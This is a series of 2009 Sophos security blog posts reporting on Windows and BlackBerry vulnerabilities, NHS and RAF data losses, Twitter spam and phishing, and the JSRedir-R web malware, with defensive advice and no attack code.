Cracked Windows - Microsoft warns of critical flaw

Microsoft has published a security advisory warning of a critical vulnerability in Microsoft DirectX on older versions of Windows.

The problem is in the way that Microsoft DirectShow handles QuickTime format files - meaning that if a user opened a maliciously crafted QuickTime media file, the hackers could run dangerous code on your computer.

According to Microsoft, all versions of Windows Vista and Windows Server 2008 are not vulnerable but Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are affected.

A proper patch for the problem is not yet available, but the company has issued a workaround that can be used by vulnerable Windows users.

The workaround, which disables QuickTime parsing, involves making changes to the Registry. But if the thought of doing that gives you goosebumps, they've produced a natty automated method that will do it for you. All you need to do is click on a "Fix It" button on their site to run the workaround.

More information about the flaw can be found in Sophos's analysis of the problem.

There's no word yet on when Microsoft will make available a proper fix for this problem, or indeed whether it will be included in their regular scheduled "Patch Tuesday" bundle of patches next month or released as an out-of-bound fix.

But I think it's good that they gave the less geeky users of computers a fairly easy way to implement the workaround, rather than leaving them befuddled by complicated instructions.

Posted on May 29th, 2009 by Graham Cluley, Sophos

Sophos.com

Why Geo-tagged Twittering could be bad for security

The web is becoming increasing about where you are, not just what you're doing/saying/reading/writing.

For instance, earlier this week I was standing in a horrendously long queue to be admitted into a recording of the BBC TV show QI, hosted by national treasure and well-known Twitter user Stephen Fry.

It became obvious to me pretty early on that there were many more people in the queue than there were likely to be seats in the studio - but there didn't seem to be any official in charge to ask what our chances of being admitted were. So, I went to Twitter and searched for "QI".

I got a number of results - many of them useless - but some of them were from other people in the queue. Now, wouldn't it have been handy if I could only have seen Tweets from people within - say - 400 yards of me?

Well, if rumoured forthcoming changes coming to Twitter are true then that may soon be possible. At a conference earlier this week, Twitter API guru Alex Payne told attendees that one of the new features that the micro-blogging site might introduce shortly is sharing of your geographic location at the point of your tweeting.

Yuck! I'm not sure I like that.

There's little enough privacy in the way many people are using Twitter right now, without also providing complete strangers with precise details of where you are.

Yes, I can see why marketroids and developers might love to be able to work out where people are at a particular time, in order to advertise to them more precisely or provide location-specific services, but I can also imagine many circumstances when I would want to keep my precise position completely private.

And let's not forget the Twitter celebrities like Ashton Kutcher, Ellen DeGeneres, Oprah Winfrey, Ryan Seacrest have over a million followers. There are bound to be a few bad apples in that bunch who may have a less than healthy interest in the precise coffee bar where their favourite star is currently having a Skinny Caffe Latte.

Just ask Yoko Ono (46,137 followers and counting) about the dangers of obsessed fans.

I'm no celebrity, but I don't want people to know where I am. If nothing else, information like that could be valuable for burglars who want to know when is the best time to raid my house.

So, here's my message to Twitter. Please don't turn on geo-tagging by default. Force people to make a conscious decision that they want their Tweets to reveal where they are at the time they Tweeted.

Otherwise, I think you can expect an almighty backlash.

(By the way, as it was, I didn't get to see QI. It turned out I was about 10 minutes too late joining the queue. Instead I went to see Star Trek. It was pretty good for what it was - but I will always be a Doctor Who fan at heart).

Posted on May 28th, 2009 by Graham Cluley, Sophos

Sophos.com

How to control a Blackberry Enterprise Server with just a PDF

Sorry, I'm not actually going to tell you how to do that.

But Research In Motion (RIM), the company who make the BlackBerry smartphones beloved by corporate workers worldwide, has warned of a vulnerability in the way its devices handles PDF files which could allow hackers to remotely execute code.

According to a security advisory issued by the firm, hackers could send email message with an attached PDF file that, when opened by a BlackBerry mobile user, could cause code to be launched on the computer that hosts the BlackBerry Attachment Service. Of course, this isn't the first time that this kind of problem with RIM's BlackBerry has bubbled up.

RIM is advising that companies disable PDF file processing on the BlackBerry server until the patches are rolled out.

As we've reported umpteen times before, hackers are increasingly exploiting the PDF file format to deliver malicious code to unsuspecting computer users.

As PDFs are so widely used and shared in business, most people wouldn't think twice of clicking on them, making it imperative that corporations keep their security patches and anti-malware defences up-to-date.

Posted on May 27th, 2009 by Graham Cluley, Sophos

Sophos.com

NHS accused of "cavalier attitude" after data security leaks

The British National Health Service (NHS) has been accused of losing almost as much personal data in the first three months of this year, as the entire private sector.

With over 140 security breaches by the NHS logged by the Information Commissioner since January, outranking all local and central government data losses combined, it has been confirmed as the public sector's main loser of personal data.

Richard Thomas, the Information Commissioner, and assistant commissioner Mick Gorrill told the Independent newspaper that NHS workers were demonstrating a "cavalier attitude" and that "there is a complete disconnect between the procedures laid down by managers and what happens on the ground. We need a complete audit to try to change the culture."

Here are some of the security breaches that rang alarm bells at the Information Commissioner's Office:

• A GP downloaded sensitive details of 10,000 patients to an insecure laptop. The laptop was stolen and still remains missing.
• 
  
• Old NHS computers containing the medical notes, names and addresses 2,500 people, which were stolen from a skip.
• A lost memory stick containing medical details of over 6,000 prisoners was encrypted and password-protected, but sadly the password was written on a note attached to the device.

One of the challenges facing the NHS is that it's the largest employer in Europe (in fact, apart from the Chinese Army and the Indian Railway system it's probably the biggest in the world), and trying to ensure that all staff treat data securely and sensibly is always going to be a challenge.

That's why it's essential that full disk encryption becomes a norm inside organisations that are handling sensitive data, such as patient records. Accidents like lost laptops will continue to happen - but something can be done to ensure that any data lost is gobbledygook that will be useless even if it does fall into the wrong hands.

Alongside encryption, organisations need to centrally monitor compliance with internal policies and external regulations through comprehensive logging and reporting.

Other organisations would be wise not to sit smugly and smirk at the NHS's misfortune. These are problems that more and more companies are going to be facing sooner rather than later.

Posted on May 26th, 2009 by Graham Cluley, Sophos

Sophos.com

Fear of blackmail after RAF loses sensitive personal data

Highly personal information about senior officers of the Royal Air Force (RAF) - including details of extra-marital affairs, debt, drug abuse, and the use of prostitutes - is alleged to be amongst the data lost from a base in Innsworth, Gloucestershire.

When I originally reported on the stolen USB drives last September, it was suggested that the information stolen had been names, service numbers, addresses and dates of birth.

Now it seems secrets of a much more sensitive nature were also lost.

Why does the RAF have such information? Because before staff are allowed access to highly sensitive information they are put through a gruelling vetting procedure - to see if they have any skeletons in their cupboards which others may use for blackmail purposes.

A former serving officer in the RAF, who uncovered the memo after reportedly worrying about his own data being lost told the BBC, "They'd ask you questions such as: is there anything unusual about your sex life? Have you had affairs? Used prostitutes? That sort of thing. If the information got into the wrong hands then it could leave people wide open."

An internal email from an unnamed wing commander, seen by the media, says that the lost data "provides excellent material for Foreign Intelligence Services, investigative journalists and blackmailers".

The fact that the RAF did not reveal that vetting data had also been lost has lead some to suggest a cover-up has occurred to save the force's embarrassment. For its part, the RAF is keen to stress that there is no indication that the data has fallen into hostile hands.

Of course, this would probably hardly be a story if the RAF had taken the sensible step in the first place of ensuring that this information was properly and securely encrypted - thus making the lost drives as useful to potential blackmailers as handlebars on a surfboard.

Posted on May 25th, 2009 by Graham Cluley, Sophos

Sophos.com

Acai Berry spammers hack Twitter accounts to spread adverts

Hundreds of innocent user's accounts on the Twitter micro-blogging service appear to have been hacked by spammers.

A typical message posted on the compromised accounts will say something similar to the following:

Howdy my friend! I just lost 13 pounds in 12 days. It only costs me $5. Take a look at this: http://[random].cn

If you do click on the link you get taken to a website with a .cn tld (top level domain) like the following:

Some victims of this latest Twitter hack attack are noticing that their account is sending Acai Berry spam, however. Take this example, for instance, where the user has apologised for the security breach on his account:

The question is - how have these accounts on Twitter been hacked? At the moment, that's not clear. But what is evident is that users need to take more care with their Twitter passwords.

If your account on Twitter has been compromised, make sure you change your password to a non-dictionary word - and be sure to also change any other online accounts where you might be using the same password. Far too many people use the same passwords on multiple sites, which obviously increases your chances of becoming hacked.

Posted on May 24th, 2009 by Graham Cluley, Sophos

Sophos.com

Podcast: Defeating hackers is hard

When I was at the RSA show in San Francisco last month I had the opportunity to spend a little time with Robert Westervelt, news editor at SearchSecurity.com.

Below you'll find a podcast we recorded where Rob lets me ramble on about the anti-virus industry, the threat landscape, the Conficker worm and why it's a struggle to bring international cybercriminal gangs to justice.

Rob had a cameraman with him, but I haven't seen the video of our conversation yet. If it does show up, I'll try and embed it here on the website too.

Posted on May 22nd, 2009 by Graham Cluley, Sophos

Sophos.com

Beware tvviter.com - video of a live Twitter phishing attack

I got an email this morning saying that someone called "3XNJTVJG0SYIKDH (NinaOchoa)" was following my updates on Twitter.

That's rather an odd name, I thought, and investigated further.

Turns out that 3XNJTVJG0SYIKDH (lets call her 3XNJTV for short) was already following nearly 400 people on Twitter, but had only ever posted one update:

check this guy out [followed by a tinyurl address]

Fortunately, I use LongUrl. I've blogged about LongUrl before, but in a nutshell it's a cool add-on for Firefox which converts short urls - like those often used on Twitter - into into their true much longer form.

And I was able to see that 3XNJTV (okay, lets call her "Nina"), was trying to point me towards a website called tvviter.com.

Did you read that right? tvviter.com (Double V, not W)

Yup, it's not the real Twitter site.

But if you do make the mistake of clicking on the link you will be taken to a bogus website which is pretending to be Twitter, and hopes to fall you into handing over your username and password (which could lead ultimately to some painful identity fraud, as well as your account being used for the purposes of spam or spreading malware).

At the time of writing the user and the website are still live - I wouldn't recommend visiting either.
And further analysis suggests that there are many other bogus Twitter users out there telling you to "check this out" and pointing to the same TinyURL link this morning.

Be careful out there.

Posted on May 21st, 2009 by Graham Cluley, Sophos

Sophos.com

Bad news - it's child's play for anyone to recover your deleted Twitterings

Following last night's discussion about British TV celebrity Jonathan Ross accidentally revealing his personal email address on Twitter (and how, despite his attempts to delete the Tweet, it's still available for anyone to read) I've found about an online service which makes it even easier to find those Tweets that all of us would like to retract.

Tweleted is a simple website that allows you to enter anybody's Twitter name and it will then uncover their "deleted" Tweets by comparing the individual's Twitter history to the results from Twitter Search.

The outcome? Anyone can easily find out all they would ever want to know about your deleted Tweets.

The only good news is that it appears it only searches back in the last 1000 of your messages or so, but that'll be scant relief for those who've accidentally pressed a little prematurely.

As I said in the earlier video Twitter really needs to get this problem fixed. Twitter users expect their Tweets to be deleted when they press the delete button, not for strangers to be able to uncover them at will.

At the moment, all Twitter can suggest if you want to really remove a public Tweet you made in error from their search results is that you contact them.

Shouldn't it be simpler than that?

Deleted should always mean deleted, and nothing less.

Posted on May 19th, 2009 by Graham Cluley, Sophos

Sophos.com

BBC film of remote Trojan horse attack

A couple of months ago, the BBC broadcast a film that many people believe showed them breaking the law, by accessing the computers of unsuspecting members of the public without their permission in order to demonstrate how easy it was to send spam.

There was a right royal stink about it.

I must admit that I was disheartened with the way the BBC behaved (as I felt it was completely unnecessary to break the law in order to demonstrate the problem of botnets), and felt even more let-down when they censored me from making my views heard!

Anyway, today the BBC has published another movie - again with assistance from Jacques Erasmus of PrevX.

It's a short and basic video, and doesn't demonstrate anything that anyone who hasn't been following IT security for the last few years doesn't already know. But this time they seem to have gone out of their way to make it clear that they did have the permission from the owner to access the PC.

It's good to see that they seem to have learnt something from the earlier furore.

Posted on May 18th, 2009 by Graham Cluley, Sophos

Sophos.com

Guest blog: Security = safety? Sounds risky!

Graham Lee, is not only a near namesake of mine, but also a senior Mac software engineer at Sophos and the author of "Ten tips to secure Apple Mac laptops". Over to you Graham...

Earlier this week, Dennis Fisher wrote a column for ThreatPost declaring that Snow Leopard security is all relative, which Jon Gruber linked to with a discussion on Daring Fireball, called the difference between security and safety.

I wanted to address both, but realised I was in danger of rambling - so I have decided just to look at Gruber's post.

One thing which annoys me, and which I addressed in my talk to NSConference in April, is this idea that security means something different in the online world than the real world.

No, it doesn't.

If we try to claim that words have different meanings when used about computers then all we end up doing is confusing people. Do any of the keys you lock your doors with have a piece you give away freely to other people? No? Then why do we have public keys in asymmetric encryption?

Anyway, in the Daring Fireball post, we see "Security is about technical measures, like the strength of the locks on your doors and windows."

Those are security measures. Security is being (or feeling) free from threat, both in the real world and online. I saw a definition of security as a state where "things which should happen, do, and things which shouldn't happen, don't" and to me that seems like a good meaning. Notice too that it isn't a technosphere-only definition.

So why has Gruber taken a narrower view?

Maybe he wanted to avoid the "Macs are more secure" canard by giving "the likelihood that you’ll
actually suffer from some sort of attack" another name; safety. So it doesn't matter whether Macs are more secure or not, says he, they're more safe and that's what people are after.

Well, it isn't; it's (along with the cost of such an attack) risk. Safety is the state of not suffering or causing harm.

But even ignoring the lexical games, risks are like stock prices - previous performance isn't always a good indicator of future behaviour. When CISOs write security policies they consider (or at least they should consider) what looks likely to happen - or expensive if it were to happen, or both - in the future. Relying too much on previous personal experiences is a known effect, though. It's a form of the availability heuristic.

Just as people who've never been burgled tend to consider the likelihood of being burgled in the future to be lower than those who have, could it be that the Mac users who've never knowingly experienced a malware attack have an artificially low opinion of the future likelihood?

What we really know is that Macs have a lower historical frequency of being targets of malware attacks.

Risks are also like shares in that there are many of them, and they all perform differently.

In fact, going back to the burglaries, many burglars get in through an unlocked window or door - the real-life analogy to having a guessable or empty password.

That's going to let people in, malware or no malware.

Posted on May 15th, 2009 by Graham Lee, Sophos

Sophos.com

Malicious JSRedir-R script found to be biggest malware threat on the web

Research done by experts in SophosLabs has revealed that a new web-based threat has blown all previous web-based malware out of the water, being found six times more often than its nearest rival.

Troj/JSRedir-R accounts for some 42% of all malicious infections found on websites in the last seven days, massively overshadowing its nearest rival - Mal/Iframe-F - at 7%.

Typically, JSRedir-R is found on legitimate websites, hidden behind obfuscated JavaScript, loading malicious content from third-party sites without the user's knowledge. In the below case, the obfuscated script tries to download dangerous code from a site called gumblar.cn.

High traffic websites which have been hit by the attack include the highly unpleasant 2 Girls 1 Cup viral video site (I've never been there, but its Wikipedia entry tells me that I probably would never want to, and neither should you), as reported by SophosLabs at the beginning of the month.

For JSRedir-R to have overtaken the previously seemingly unbeatable Mal/Iframe-F in the web malware charts is quite an event. Users of Sophos security solutions, including our web appliance, are already protected against this threat - but if you use another vendor's product make sure that you are updated and protecting against JSRedir-R before it drags malicious code onto your desktops.

In addition, if you run a website make sure it is properly hardened to prevent hackers from injecting their malicious code into your pages, or you could be passing an unpleasant pox onto your visitors.

No-one should be in any doubt that the web is the primary vector by which hackers are trying to infect computers today. Our most recent security threat report revealed that we see a new infected webpage every 4.5 seconds - that's three times more than the rate in 2007 - and it doesn't look like things are getting any better.

Update: Read the blog entry from Paul Baccas of Sophos to read more about how this malware is being planted, and how to clean-up your website afterwards.

Posted on May 14th, 2009 by Graham Cluley, Sophos

Sophos.com